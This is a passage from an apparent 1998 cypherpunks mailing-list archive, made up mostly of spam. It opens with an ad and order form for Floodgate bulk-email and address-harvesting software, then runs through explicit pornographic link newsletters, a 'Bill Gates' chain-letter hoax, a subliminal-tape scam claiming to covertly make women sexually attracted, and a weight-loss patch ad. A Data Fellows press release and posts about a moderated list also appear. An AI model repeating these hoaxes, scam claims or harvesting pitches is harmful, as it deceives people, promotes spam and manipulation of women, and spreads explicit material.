Windows 95 OR Windows 3.1 with 8 meg ram
Extra 5 MB hard drive space

Floodgate & Goldrush can be run on a fast Mac with 24 MB RAM and SoftWindows.

NOTES FROM SATISFIED USERS

"It is everything you said it was. Within one week of my first mailing, I received a record number of orders. All you need to print money is a decent sales letter. Thanks." Randy albertson, Wolverine Capital.

"After using Floodgate and your utility program all day today, let me say these are as two of the finest programs I have ever bought in my 52 years! Your support has been superb. Thank You!" Vernon Hale, Prime Data Systems

"My first day and I just used Floodgate and Pegasus to send 1,469 sales letters. So far I've got about 25 positive responses. It works GREAT!!! Thanks." Donald Prior

"Floodgate is awesome!. I recently started a new business on-line. I stripped the addresses of the AOL & CIS classifieds. I sent out 3,497 email letters and got over 400 people to join my company in 5 days! Needless to say, it pays for itself." David Sheeham, OMPD

"I was able to use Floodgate to extract the names from the Internet news groups. It works perfectly. Needless to say, I am very excited about the use of this new technology." Mark Eberra, Inside Connections

"This is a great piece of software and an invaluable marketing tool." Joe Kuhn, The Millennium Group

"I just thought you'd like to know that this program is fantastic. After loading it on my system, I wanted to test it out. In my first hour of using this, I collected 6,092 email addresses!" Richard Kahn, LD Communications

"I just love the Floodgate program. It saves me hours and hours of time. This is the beginning of a wonderful FUN time marketing on-line. Thank you so much for writing this program." Beth O'Neill, Eudora, KS

"Your software is brilliant, and from the technical support I've received, I can see you have a genuine love and respect of people...Floodgate is a divine package. Wish I had found it sooner." Tom Sanders, Peoria, IL

"I really like the way the Floodgate software package works. It is very easy to use, and really does the trick. It has already saved me an incredible amount of time and energy." John Berning, Jr., Fairfield, NJ

"It's going great with FLOODGATE! I like using Delphi. I just collected 50,000+ addresses within 20 minutes on-line." Richard Kahn, R&B Associates

-------------------------------------------------
E-Z ORDER FORM:

Please print out this order form and fill in the blanks......
Please send order form and check or money order, payable to:

Ted Keller
P.O. Box 741342
Boynton Beach, FL 33474-1342
(561)-965-6139


______Yes! I would like to try your cutting-edge software so that I can advertise my business to thousands of people on-line whenever I like! I understand that I have 10 days to trial the software. If I am not fully delighted, I will cheerfully be refunded the purchase price, no questions asked! Please rush me the FLOODGATE and GOLDRUSH package now!

______I am ordering within 72 hours! That qualifies me to receive the FLOODGATE and GOLDRUSH package at a substantial discount! I am ordering BOTH software packages for only $349.95. (Save $150 off the retail price....Software has sold for as much as $2,499.95)

______I am ordering within 72 hours! That qualifies me to receive UNLIMITED technical support for 30 days.

______I want to receive the package OVERNIGHT. I'm including $18.00 for shipping charges.

______I want to receive the package 2nd DAY. I'm including $10.00 (includes insurance & return receipt) for shipping charges.

______I'm ordering Floodgate / Goldrush software and want to order the MILLIONS of email addresses as well. My additional cost is $100.00 enclosed.

______I'm NOT ordering your Floodgate / Goldrush software, but I
want to order your MILLIONS of email addresses on CD. Enclosed is $249.00.

(CHECKS: ALLOW 1 WEEK FOR BANK CLEARANCE)


YOUR NAME_________________________________________________

COMPANY NAME_________________________________________________

YOUR POSITION_____________________________________________

STREET ADDRESS______________________________________________

CITY, STATE, ZIP____________________________________________

PHONE NUMBERS_______________________________________________

FAX NUMBERS_________________________________________________

EMAIL ADDRESSES_____________________________________________

************************************************************

We accept Checks, Money Orders, MasterCard, Visa,
American Express. You can either mail your order to 
us OR fax your order to:

			(561)-966-6839
************************************************************

Today's date:_____________
 
Visa____MasterCard____American Express____Discover_______
 
Card #:____________________________________________________
 
Expiration date:___________________________________________
 
Name on card:______________________________________________
 
Billing address:___________________________________________
 
Amount to be charged: $________________


Signature:___________________________________________


I agree to pay Ted Keller an additional $29 fee if my check is returned for insufficient or uncollectable funds.

SIGNATURE: X________________________________DATE:_______________

Please send all order forms and check or money order to payable to:

Ted Keller
P.O. Box 741342
Boynton Beach , FL 33474-1342
(561)-965-6139


***************************************************

OR:

PLEASE PASTE YOUR CHECK HERE

(If you fax a check, there is no need for you to send the original check by mail. We will draft up a new check, with the exact information from your original check that you faxed to us)

Please fax the above order form and check to: 1-561-966-6839
C




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: eureka@eureka.abc-web.com
Date: Wed, 4 Feb 1998 04:59:38 -0800 (PST)
To: All Eureka! Subscribers: ;
Subject: Eureka! Wed Feb 4 '98
Message-ID: <19980204083315.11433.qmail@eureka.abc-web.com>
MIME-Version: 1.0
Content-Type: text/plain


Welcome to Wednesday's issue of Eureka!

PUSSY PARADISE
Yet again Eureka! has managed  to negotiate a special week's
free access  to one of the web' s premier porn sites.  Pussy
Paradise is simply  packed with 100s  of videos (many live),
thousands of photos,  and so much more.  You will  need your
credit card as adult verification but it will not be charged
for your free week! So check it out - there's smut a plenty!
Pussy Paradise .... http://www.pussyparadise.com/eureka.html

Playgal - No.1 in Internet Hardcore!
http://www.playgal.com/playgal/banner_eureka.html
Playgal presents FREE LIVE FUCKING, and over 2,000 FREE XXX
MOVIES!

THE REAL NETWORK
Every now and then we come across a real winner. This is one
of those places.  Click on  the Real Amateur Wives, Lovers &
Girlfriends.  Then click enter, then find Sarah.  Ahh Sarah,
she  starts out slow but later you'll see what I mean.  This 
is one  must see amateur!  A sexy  young brunette  with just
the right  amount of  baby fat.  Raw and real.  Surf it now!
The Real Network ................. http://www.ilynx.com/raw/ 

ANAL BABES
Make a stop on the information  super highway if you want to
see some hot amateur  action.  Quick loading  thumbnail pix,
there for all to see.  Check out the strange object pictures
for one sexy  blonde who love to  show off her pink, and I'm
not talking about her blouse either.  You'd hate to miss it!
Anal Babes ........................ http://www.analbabes.com

LA LA LEGS
Well, it's a leg thing,  and a pantyhose thing, a babe thing
a pussy, pussy, pussy thing! See their two galleries for the
free pix.  Dig the sexy school girl in the plaid skirt! Yum!
La La Legs ......................... http://www.lalalegs.com

NC17
Go to the  site then to the  enter here  link at the bottom,
then click on the index 2 photo gallery.  Your in!  Click on
page one for one hot tasty blonde bombshell!  The photos say
lick me all over!  Great tits, legs and ass! See the bush on
the black haired beauty, page 4. It'll straighten your dick!
NC17 .......................... http://www.nc17.com/nc2.html

READ THIS!! WIN ,000 and a Fantasy Date - Click Here Now!
,000! ---> http://208.195.150.31/us/us_main.cgi/us_5267/A

HOORAY! THE ADULT SEARCH ENGINE
Now you can search for the sex sites you are looking for and
fast!  This new search engine is setting the standard others
will follow.  It offers pop-up search and detailed listings!
Hooray! -----------------> http://eureka.abc-web.com/hooray/

FREE STREAMING VIDEO
Please note that most of these feeds require a Netscape bro-
wser in order to successfully view them. Unfortunately Micr-
osoft's browser does not have all the features of Netscape's
yet.  However, many of the feeds use the RealPlayer and will
work in most browsers.  If you do not have Netscape and want
a free copy click here --> http://www.netscape.com/download/
Teenage lesbian -> http://207.240.169.120/lesbian/start.html

CHAT WITH OTHER READERS
Hey,  if you haven't checked out the Eureka! Chat sites yet,
you're  missing out  on some  great stuff.  Every day you'll
find hundreds of other readers just like you looking to chat
have fun and maybe a little 'cyber'. We know you'll love it!
Adult/Sex Chat -----------------> http://137.39.63.229/chat/
General/Fun Chat -------> http://137.39.63.229/chat/funchat/

HOT LIVE PHONE SEX TO MAKE YOU CUM!
LD Call only! - Live Hot Girls!!!!----------->1-664-410-3912
LIVE: 1-on-1, 2-on-1, Group, Dateline-------->1-800-644-8779
FREE: Live 1-on-1 (international call only)--->011-678-77416

NEW! CENTERFOLD PIC OF THE DAY
Exclusive!  We proudly present  unpublished Pictures of your
favorite Centerfolds.  Featured This Week: Dec 80-PMOY Terri
Welles, Dec 89-Petra Verkaik, Sept 93-Carrie Westcott, Kerri
Kendall,  Rebecca Ferratti,  Lydia Schone and many more too!
---------------------------> http://www.gatefold.com/eureka/

AMATEUR SITE OF THE DAY
Shannon: An up and coming  magazine  model, this young thing
has the dimensions of a Greek goddess  - 36. 24. 32. This 22
year old whose turn-ons include candles and posing nude also
loves to go 4x4ing, camping  and rollerblading. Visit her to
find out how much fun 4x4ing can be!
---------------------------> http://amateurindex.com/eureka/

EROTIC STORY SITE OF THE DAY
Adult Story of the Day:  Read  something for a change! Every
day the Adult Story of the Day  offers you a free erotic sex
story for your reading pleasure.............................
............................... http://www.adultstories.com/

DAILY CARTOON ----------> http://www.erosinorbit.com/eureka/

ADULT STAR PIC OF THE DAY
Woah,  our Adult Star pics are getting hotter and hotter, so
make sure you stop by and check out today's - definitely not
to be missed! --------> http://www.xxxadultstars.com/eureka/

OTHER EUREKAS!
GAY EUREKA! ----------> http://eureka.abc-web.com/gayeureka/
DEUTSCH ------> http://eureka.abc-web.com/eureka/deutsch.htm
ESPAOL ------> http://eureka.abc-web.com/eureka/espanol.htm
FRANAIS ----> http://eureka.abc-web.com/eureka/francais.htm
ITALIANO ----> http://eureka.abc-web.com/eureka/italiano.htm
PORTUGUESE > http://eureka.abc-web.com/eureka/portuguese.htm

TODAY'S FREE PIX
Pic  1 --------------------------> http://137.39.63.229/?040
Pic  2 --------------------------> http://137.39.63.229/?041
Pic  3 --------------------------> http://137.39.63.229/?042
Pic  4 --------------------------> http://137.39.63.229/?043
Pic  5 --------------------------> http://137.39.63.229/?044
Pic  6 --------------------------> http://137.39.63.229/?045
Pic  7 --------------------------> http://137.39.63.229/?046
Pic  8 --------------------------> http://137.39.63.229/?047
Pic  9 --------------------------> http://137.39.63.229/?048
Pic 10 --------------------------> http://137.39.63.229/?049

============================================================
TO UNSUBSCRIBE FROM THIS NEWSLETTER,  USE THE REPLY FUNCTION
IN YOUR EMAIL PROGRAM, AND SEND THIS EMAIL RIGHT BACK TO US.
============================================================




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mia Westerholm <Mia.Westerholm@DataFellows.com>
Date: Wed, 4 Feb 1998 01:43:42 -0800 (PST)
To: Crypto-Press-Global@DataFellows.com
Subject: Data Fellows wins another acclaimed award
Message-ID: <3.0.2.32.19980204104606.00bf56bc@smtp.DataFellows.com>
MIME-Version: 1.0
Content-Type: text/plain


Data Fellows Ltd.	 Media Release

For immediate release
4 February 1998

DATA FELLOWS WINS ANOTHER ACCLAIMED AWARD

International Success Recognized by Head of State

The developer of F-Secure data security products, Data Fellows Ltd., has
received the President of Finland's Export Award. This award is granted
annually to the most outstanding export companies in the country. This is
the first time a developer of commercial software packages has been granted
the award.

Data Fellows is one of the world's leading developers of data security
products. It has offices in San Jose, California, and Espoo, Finland, as
well as distributors in over 50 countries all around the world. Its
products have been translated to over 30 languages. The company's annual
growth in net sales has been over 100% since it was founded in 1988.  

"The award is a recognition of our status as a leading international data
security development company," says the Chief Executive Officer of Data
Fellows Ltd., Mr. Risto Siilasmaa. "I believe our success is based on two
things: excellent products and high quality services."

The most successful product group of the company is its F-Secure Anti-Virus
products. Data Fellows is the developer of the revolutionary CounterSign
Technology, which enables the use of several scanning engines
simultaneously.  Due to this groundbreaking technology, the theoretical
chances of a virus slipping through to a computer or a network are smaller
than ever. F-Secure Anti-Virus offers unrivalled protection by combining
the best available single scanning engine F-PROT with the AVP anti-virus
engine, which also ranks among the best in the world.

Another fast growing business area for Data Fellows is its F-Secure
cryptography software products. The F-Secure product family uses the best
available military strength encryption and authentification algorithms to
protect confidential data.  F-Secure products are based on the SSH
protocol, which provides a generic transport-layer encryption mechanism for
network connections. The SSH protocol provides both host authentication and
user authentication, together with privacy and integrity protection.

The products of Data Fellows have already won numerous international tests
and competitions, including the 1996 European Information Technology Prize;
Data Communications Magazine's Hot Product of the Year 1997; SVM Magazine,
May 1997, Best Anti-Virus; and SECURE Computing's Editor's Choice.

Data Fellows belongs to an elite group of companies that have a triple-A
rating from Dun&Bradstreet.  Triple-A is the highest possible credit rating.

For further information, please contact:

Data Fellows Ltd.
Mr. Risto Siilasmaa, Chief Executive Officer
Tel. +358-9-859 900
e-mail: Risto.Siilasmaa@DataFellows.com 

or  visit the Data Fellows web site at http://www.DataFellows.com 

Mia.Westerholm@DataFellows.com 
http://www.DataFellows.com

Data Fellows Ltd.
PL 24
FIN-02231 ESPOO, FINLAND
Tel. +358 9 859 900
Fax. +358 9 8599 0599




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jacket9@primenet.com (Tony O.  AKA College Guy)
Date: Wed, 4 Feb 1998 17:35:58 -0800 (PST)
To: imeldam56@hotmail.com
Subject: PLEASE READ! YOULL BE GLAD YOU DID, MONEY MONEY
Message-ID: <199802050132.SAA13178@smtp03.primenet.com>
MIME-Version: 1.0
Content-Type: text/plain



>>>>
>>>>TO: MASSAOL@aol.com
>>>>FROM: GatesBeta@microsoft.com
>>>>ATTACH: Tracklog@microsoft.com/Track883432/~TraceActive/On.html
>>>>
>>>>Hello Everyone,
>>>>And thank you for signing up for my Beta Email Tracking Application or
(BETA)
>>>>for short. My name is Bill Gates.  Here at Microsoft we have just
compiled an
>>>>e-mail tracing program that tracks everyone to whom this message is
forwarded
>>>>to. It does this through an unique IP (Internet Protocol) address log book
>>>>database.
>>>>We are experimenting with this and need your help.  Forward this
>>>>to everyone you know and if it reaches 1000 people everyone
>>>>on the list you will receive $1000 and a copy of Windows98 at my expense.
>>>>Enjoy.
>>>>
>>>>Note: Duplicate entries will not be counted. You will be notified by email
>>>>with further instructions once this email has reached 1000 people. Windows98
>>>>will not be shipped unitl it has been released to the general public.
>>>>
>>>>Your friend,
>>>>Bill Gates & The Microsoft Development Team.
>>>>
>>>
>>
>>
>Madeline
>
>
>





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ls6Q1MOb7@yahoo.com
Date: Wed, 4 Feb 1998 19:21:32 -0800 (PST)
To: users@juno.com
Subject: Subliminally Seduce  Women  Instantly!
Message-ID: <bN0M998F80KCy6So>
MIME-Version: 1.0
Content-Type: text/plain




Win over any woman you want in less than an hour. 

GUARANTEED!

Start dating women that until now were 'out of your league'

GUARANTEED!

I know it sounds too good to be true, but it is now  possible for you to
achieve in minutes, what typically takes most men days, months, and
sometimes even years to accomplish...SEDUCING A WOMAN!

Skeptical?

Read this. Then visit our web site to learn the FACTS!

Scientists worldwide agree that, in certain applications, subliminal mind control can accomplish amazing things. You might have heard how in the 1950s subliminal advertising was used in movie theaters to induce an unnatural craving for popcorn and an unquenchable desire for Coke.

There are many types of subliminal thought control.  Certain subliminal
influence techniques work AMAZINGLY well, while others hardly work at all!

If you don't think modern subliminal technology can change your life, THINK AGAIN! For less than the cost of a single good meal you can instantly and permanently change the way women treat you. GUARANTEED!

And the best part is that (due to a legal loophole) this is perfectly legal!

If your luck with women has been anything other than GREAT, find out the FACTS by visiting our web site.

Once you have received and tested one of our audio tapes you will be AMAZED!

Don't make the mistake of confusing the antiquated technology used in the past with newly developed digital mastering techniques. We have spent years developing computer enhanced techniques that enable us to produce mood altering products that work on any woman, anywhere, anytime...

GUARANTEED!

You cannot turn women into mindless sex slaves with this or any other
technology. You can, however, induce at will, natural urges that would otherwise lie dormant. It is simply a fact that any natural human desire such as sleep, hunger or sexual impulses can be GREATLY INTENSIFIED by using subliminal commands.

When you play these recordings in the presence of any female who has a normal sexual appetite, look out!  She won't know what has come over her! It is completely undetectable!

Even women you barely know, when subjected to this invisible aphrodisiac will find you more interesting and better looking. They will find themselves mysteriously drawn and sexually attracted to you. GUARANTEED!!

Each of our musical recordings comes with a second 'demo' tape (free of charge) that has the subliminal messages brought forward for you to hear loud and clear. Don't let your girlfriend hear this one!

WARNING: We have given you the opportunity to be more
successful with any woman you choose. If you do not at least check out the facts for yourself, you will only be cheating yourself out of
happiness and romance.

To find out more about these AMAZING tapes at our web site at:

http://www.ivpco.com/~speccass/index.html

or, if your mail reader supports hyper-links,
CLICK HERE

If you have any problems accessing our main page, try our new mirror site at:

http://www.emptyshell.com

MIRROR SITE


**********************************************************************
This message was sent by Overseas Internet Promotions, Inc. of Miami.  If you have a product or service you want to market on the Internet, call us today @ 305-668-7502
**********************************************************************






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <anon@anon.efga.org>
Date: Thu, 5 Feb 1998 04:21:19 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Changing to Moderated Cypherpunks -- How?
In-Reply-To: <199802050343.DAA46984@out5.ibm.net>
Message-ID: <c86e554557730c5e60a5fba31c49e596@anon.efga.org>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 03 Feb 98 21:27:46 -0800  "James F. Marshall" <marshall@ibm.net> wrote:

>Too much noise in the unedited list.
>
>How does one change to the moderated list?

Easy

<cypherlist-watch-digest-subscribe@joshua.rivertown.net>








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dean@intergal.com
Date: Fri, 6 Feb 1998 10:34:42 -0800 (PST)
To: webmasters@modelsincorporated.com
Subject: Major Launch
Message-ID: <199802051301.IAA03296@modelsincorporated.com>
MIME-Version: 1.0
Content-Type: text/plain


THIS EMAIL IS INTENDED FOR ADULT WEBMASTERS WHO HAVE SIGNED UP
FOR OUR MAILING LIST

Hi from Dean at Playgal,

I have sent this email to advise you of a major change and opportunity. As
you may be aware both Intertain ( the nets first paysite ) and Playgal have
formed a partnership. Together we form one of the largest adult networks on
the Internet - our newly formed operation is Intergal.

We have now combined our click through programs and launched the new
Intergal advertising programs. We have a unique hit based click through
which will guarantee a minimum payout http://www.intergal.com/nfa and
offers huge conversion rate bonuses which means you can earn up to $5 a
unique hit. 

Or we have the no frills NO FUCKING ABOUT campaign IN THE RAW - the click
through which pays you 5.5 cents a raw hit - no conversion rates, just good
old RAW hits. http://www.intergal.com/nfa/nfa.html

You can select from our banner farm or use your own banners - we allow text
links. It is up to you to send us as much traffic as possible - we
encourage you to do it. Please feel free to use any marketing initiative
you wish to maximize traffic sent to our sites - we understand the fact
that you know your sites better than us . ( virtually the only thing we
dont approve of is cheating ).

We have one of the highest raw hit counts of any click through on the net -
undisputed. We dont filter hits ! 

A great suppliment to your Intergal program is to advertise the nets newest
and freshest site http://www.unfaithful.com you can sign up for the click
through at http://www.unfaithful.com/easycash .

Thanks for taking the time to read our announcement i have outlined below
some services available to adult webmasters.

Paysite Operators

We have a few deals for you and offers for you. It will be worthwhile your
time reading below.

1. FREE VIDEO FEEDS

10 rotating feeds an hour - 240 new feeds a day for FREE

Check it out at http://www.virtualgirlz.com

or for Gay go to http://www.virtualgirlz.com/freeholio/gay.html

(YOU CAN EVEN PUT IT IN A FRAME!!!)

and it works with AOL , IE and Netscape

to sign up for free for 240 Free feeds each day.  Go to:


http://www.zanepix.com/240free.html

2. PASSWORD PROTECTOR

Does your site get hit with password traders - we have the solution - if
you run a unix operating system then you can stop password sites crashing
your servers. The answer is Pennywize and it is only 99.95 - if you have a
password posted on a big password site it will cost you much more than that
in bandwidth. http://www.pennywize.com . Download it now - free tech
support always available and you get all future updates. The best thing is
it is so easy to install.

3. FREE TRAFFIC TO YOUR SITE AND GROWING EVERYDAY - NO LINK BANK REQUIRED

Sign up for this today - surfers dont leave your site but you will get
traffic back every day in return.


http://eureka.abc-web.com/eureka/

This is the most innovative product to hit adult webmasters in years. 

4. More Free Traffic

Intergal have just recently bought Picturepost http://www.picturepost.com -
it is ranked at number 7 on websidestory with about 90,000 uniques a day .
Add a picture post text link to your front page and you are eligible to
submitt a pic and get back about 10,000 hits in a week - for FREE.

5. We also highly recommend some of our feed suppliers 

1. http://www.ibroadcast.net     email   - joey@ibroadcast.net and add
1,300 feeds to your site

2. http://www.megahardcore.com email andy@wd.com and add streaming videos
with sound and they have a fantastic new virtual world package available.

3. Live fucking with sound email opm@pusi.com 

4. 1,200 searchable feeds email davidk@xtv.com works with AOL , IE and
Netscape

6. For cc processing we have had a very successful relationship with Ibill
http://www.ibill.com or email the VP kmiller@ibill.com 

7. For bandwidth we thoroughly recommend exodus.net contact
jennifer@exodus.net for special attention and pricing.

If you have received this email in error please put remove in the subject
field and reply.

Thanks for your time and for supporting our group of sites.

regards




Dean









From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: eureka@eureka.abc-web.com
Date: Thu, 5 Feb 1998 04:31:32 -0800 (PST)
To: All Eureka! Subscribers: ;
Subject: Eureka! Thu Feb 5 '98
Message-ID: <19980205083129.13871.qmail@eureka.abc-web.com>
MIME-Version: 1.0
Content-Type: text/plain


Welcome to Thursday's issue of Eureka!

FRESHTEENS!
Is there no end to it? Yet again we have succeeded in obtai-
ning a FREE one week trial,  for all Eureka!  subscribers at
another of the net's finest websites. Freshteens offers over
200 video feeds, hot live,  sex shows,  hard XXX movies, hot
XXX stories,  exclusive Texas Teens, and a comprehensive gay
area too. You need a credit card to verify you are an adult,
but will not be charged for your FREE membership. Excellent!
Freshteens ........... http://www.freshteens.com/cproot/1217

Oriental Beauty
http://www.orientalbeauty.com/entry.phtml
100% Free site with softcore and (some) hardcore pictures of
the most beautiful Asian women I have ever seen! All
pictures can be found in easy to navigate picture galleries
with thumbnail previews, so you only download the pictures
that you like! There are two fresh pictures every single
day. Finally, there is also an extensive links section with
links to other Asian sites worthy of a visit. More than
enough reasons to visit us!

SINK THE PINK
Go there  now if you want  to see a lot  of great  free pix.
They have so much brown bush  in here we may have to call in
a weed wacker!  This is a cool site, easy to navigate thumb-
nails of high quality images and tons of great pix.  Featur-
ing  group sex,  asian,  anal,  oral and brunettes and more!
Sink The Pink ................... http://www.sinkthepink.com

CYBERJOY
Yes, this is yet another great site for some free pix!  Text
links on a light colored background lead you to double dicks
in one box, blowjobs,  cumshots and all that jazz!  Just the 
way you  like it.  Point your browser over there and see it!
Cyberjoy ......... http://www.cyberjoy.inter.net/accept1.htm

ASSES & PUSSIES
We got  butts and bush.  Not a bad mix.  This webmaster  has
built a quick loading website with a good interface. By that
I mean that  you will have great  looking butts and pussy in
your face really fast! High resolution and high desire. Yes! 
Asses & Pussies ................... http://www.asspussy.com/

HOT CAMILLE
There is  a membership in here  but to entice us there are a
few free pix of one hot little sexpot!  She likes showing us
her pussy and ass and  she love dick.  Not a bad  way to go.
There are even two free videos, small but some serious pink!
Hot Camille ..................... http://www.hotcamille.com/

#READ THIS!! WIN $25,000 and a Fantasy Date - Click Here Now!
#$25,000! ---> http://208.195.150.31/us/us_main.cgi/us_5267/A
#
HOORAY! THE ADULT SEARCH ENGINE
Now you can search for the sex sites you are looking for and
fast!  This new search engine is setting the standard others
will follow.  It offers pop-up search and detailed listings!
Hooray! -----------------> http://eureka.abc-web.com/hooray/

FREE STREAMING VIDEO
Please note that most of these feeds require a Netscape bro-
wser in order to successfully view them. Unfortunately Micr-
osoft's browser does not have all the features of Netscape's
yet.  However, many of the feeds use the RealPlayer and will
work in most browsers.  If you do not have Netscape and want
a free copy click here --> http://www.netscape.com/download/
Max Hardcore --------> http://207.240.169.121/max/start.html

CHAT WITH OTHER READERS
Hey,  if you haven't checked out the Eureka! Chat sites yet,
you're  missing out  on some  great stuff.  Every day you'll
find hundreds of other readers just like you looking to chat
have fun and maybe a little 'cyber'. We know you'll love it!
Adult/Sex Chat -----------------> http://137.39.63.229/chat/
General/Fun Chat -------> http://137.39.63.229/chat/funchat/

HOT LIVE PHONE SEX TO MAKE YOU CUM!
LD Call only! - Live Hot Girls!!!!----------->1-664-410-3912
LIVE: 1-on-1, 2-on-1, Group, Dateline-------->1-800-644-8779
FREE: Live 1-on-1 (international call only)--->011-678-77416

NEW! CENTERFOLD PIC OF THE DAY
Exclusive!  We proudly present  unpublished Pictures of your
favorite Centerfolds.  Featured This Week: Dec 80-PMOY Terri
Welles, Dec 89-Petra Verkaik, Sept 93-Carrie Westcott, Kerri
Kendall,  Rebecca Ferratti,  Lydia Schone and many more too!
---------------------------> http://www.gatefold.com/eureka/

AMATEUR SITE OF THE DAY
Jan: She is what excites all  of us about amateurs. This gal
is hot and raw! Her web page  design and graphics may not be
the best, but she loves to  show  off.  A wife and mother of
three, she wants the entire world to see her great body! Not
only is she a babe, but  she  has a very active imagination.
Stop by and see if you can be her next fantasy!
---------------------------> http://amateurindex.com/eureka/

EROTIC STORY SITE OF THE DAY
VoyeurStories.com: Want  some  sizzling  free  voyeur erotic
stories accompianied by GENUINE  hidden camera pics? Satisfy
your peeping tom curiosity by visiting VoyeurStories.com....
.............................. http://www.voyeurstories.com/

DAILY CARTOON ----------> http://www.erosinorbit.com/eureka/

ADULT STAR PIC OF THE DAY
Woah,  our Adult Star pics are getting hotter and hotter, so
make sure you stop by and check out today's - definitely not
to be missed! --------> http://www.xxxadultstars.com/eureka/

OTHER EUREKAS!
GAY EUREKA! ----------> http://eureka.abc-web.com/gayeureka/
DEUTSCH ------> http://eureka.abc-web.com/eureka/deutsch.htm
ESPAOL ------> http://eureka.abc-web.com/eureka/espanol.htm
FRANAIS ----> http://eureka.abc-web.com/eureka/francais.htm
ITALIANO ----> http://eureka.abc-web.com/eureka/italiano.htm
PORTUGUESE > http://eureka.abc-web.com/eureka/portuguese.htm

TODAY'S FREE PIX
Pic  1 --------------------------> http://137.39.63.229/?050
Pic  2 --------------------------> http://137.39.63.229/?051
Pic  3 --------------------------> http://137.39.63.229/?052
Pic  4 --------------------------> http://137.39.63.229/?053
Pic  5 --------------------------> http://137.39.63.229/?054
Pic  6 --------------------------> http://137.39.63.229/?055
Pic  7 --------------------------> http://137.39.63.229/?056
Pic  8 --------------------------> http://137.39.63.229/?057
Pic  9 --------------------------> http://137.39.63.229/?058
Pic 10 --------------------------> http://137.39.63.229/?059

============================================================
TO UNSUBSCRIBE FROM THIS NEWSLETTER,  USE THE REPLY FUNCTION
IN YOUR EMAIL PROGRAM, AND SEND THIS EMAIL RIGHT BACK TO US.
============================================================




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: 42412260@via.net
Date: Thu, 5 Feb 1998 14:28:16 -0800 (PST)
To: Friend@public.com
Subject: Lose  Weight - FAST & EASY, with  "The  PATCH"   Check it out!!
Message-ID: <8241033777bur.543167.fpes>
MIME-Version: 1.0
Content-Type: text/plain


In an ongoing study, 100 people between the ages of 19-67 who weighed 17 - 163 pounds in excess of their normal body weight, LOST weight!  56% of those in the study, LOST at least 20 pounds.  FAST & EASY.  Just apply "The Patch" to your arm, and LOSE weight!<A HREF="http://www.digital.net/chl/weight.htm"Click here to order</A>





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Cypherlist-Watch Moderator <cypherlist-watch-owner@joshua.rivertown.net>
Date: Thu, 5 Feb 1998 15:08:15 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Changing to Moderated Cypherpunks -- How?
In-Reply-To: <199802050343.DAA46984@out5.ibm.net>
Message-ID: <Version.32.19980205163854.00f5e620@local.crypto.net>
MIME-Version: 1.0
Content-Type: text/plain


FYI, here is the welcome message from cypher-list watch.  If you are
interested, subscription details follow at the end of the message.



================================================================
                         The CYPHER-LIST WATCH
PLEASE retain this message for future reference. When you need to
unsubscribe, change your address for purposes of the list or reach
the list owner for an administrative request, you will find this
message valuable.
About the list:

The Cypher-list watch is a digest only list featuring information regarding
many aspects of privacy in the electronic age, such as encyption technology,
electronic privacy, anonymous remailers and related issues.  The posts from
the list may originate from other mailing lists to cover the broad topics
featured on the list.  All material forwarded is done so with prior consent
of the origining list owner. The list is suitable for many levels of user. 
Sometimes the topics will be *very* technical; others may just be *very* 
interesting! (Many will hopefully be both!)

-----------------------------------
CYPHER WATCH IS MODERATED!
In order to maintain a high level of quality, this is a moderated list. If
you have ever subscribed to a mariginally informative list, I am sure you
will appreciate the decision to present this material in this format. The
listowner spends innumerable hours every week culling through every post
from a pletorea of mailing lists to bring you the best of each. The concept
of the list could not be delivered in any other format. One way to think of
this as a Cypherpunk list without the noise!  If you want to stay informed
but you don't want to wade through 20 messages to read one useful post, this
list is for you.

Of course, moderating a list such as this involves a level of judgment, as
the Cypherlist Watch will not be a mere repetition of its origniating lists.
As such, some topics listmembers may think are important may not be covered
or may not be covered in the depth a member desires. List members should
feel free to bring such matters to the list owners attention, however, the
decision of the listowner redarding the topics to be feature is final.


------------------------------

Administrivia:

Submissions should be directed to the moderator at:

<cypherlist-watch@joshua.rivertown.net>

If a post is rejected I may or may not give a reason.  As long as
you use your common sense there should be no problems.  Attacks on
idividuals or companies are not permitted, so don't do it!  Continued
requests to post previously rejected material may also result in your
being unsubscribed from the list.


To contact the list owner in an emergency (Unsubscription requests
are *not* an emergency).

<cypherlist-watch-owner@joshua.rivertown.net>


How to Subscribe/Unsubscribe:

<cypherlist-watch-digest-subscribe@joshua.rivertown.net>
Receive future messages sent to the cypherlist-watch mailing list.


<cypherlist-watch-digest-unsubscribe@joshua.rivertown.net>
Stop receiving messages for the cypherlist-watch mailing list.

	Alternatively, you can e-mail:

	cyperlist-watch-digest-request@joshua.rivertown.net

and put 'subscribe' or 'unsubscribe' on the "Subject:" line.



Resources:

Applied Cryptography (2nd edition) by Bruce Schneier; 
published by John Wiley & Sons, Inc.; ISBN 0-471-11709-9.

PGP Users list and web site
http://pgp.rivertown.net/


================================================================
<cypherlist-watch-owner@joshua.rivertown.net>
================================================================






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Thu, 5 Feb 1998 12:17:41 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Changing to Moderated Cypherpunks -- How?
In-Reply-To: <199802050343.DAA46984@out5.ibm.net>
Message-ID: <199802052017.VAA02584@basement.replay.com>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 5 Feb 1998 07:24:11 -0500  Anonymous <anon@anon.efga.org> wrote:

>>Too much noise in the unedited list.
>>
>>How does one change to the moderated list?
>
>Easy
>
><cypherlist-watch-digest-subscribe@joshua.rivertown.net>

Wow! Thanks for that tip! The cypherwatch list looks great.  I suggest you all
subscribe now!! :-)









From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ajhh4 <ajhh4@worldnet.att.net>
Date: Thu, 5 Feb 1998 23:09:02 -0800 (PST)
To: <cybersolutions@cyou.com>
Subject: No Subject
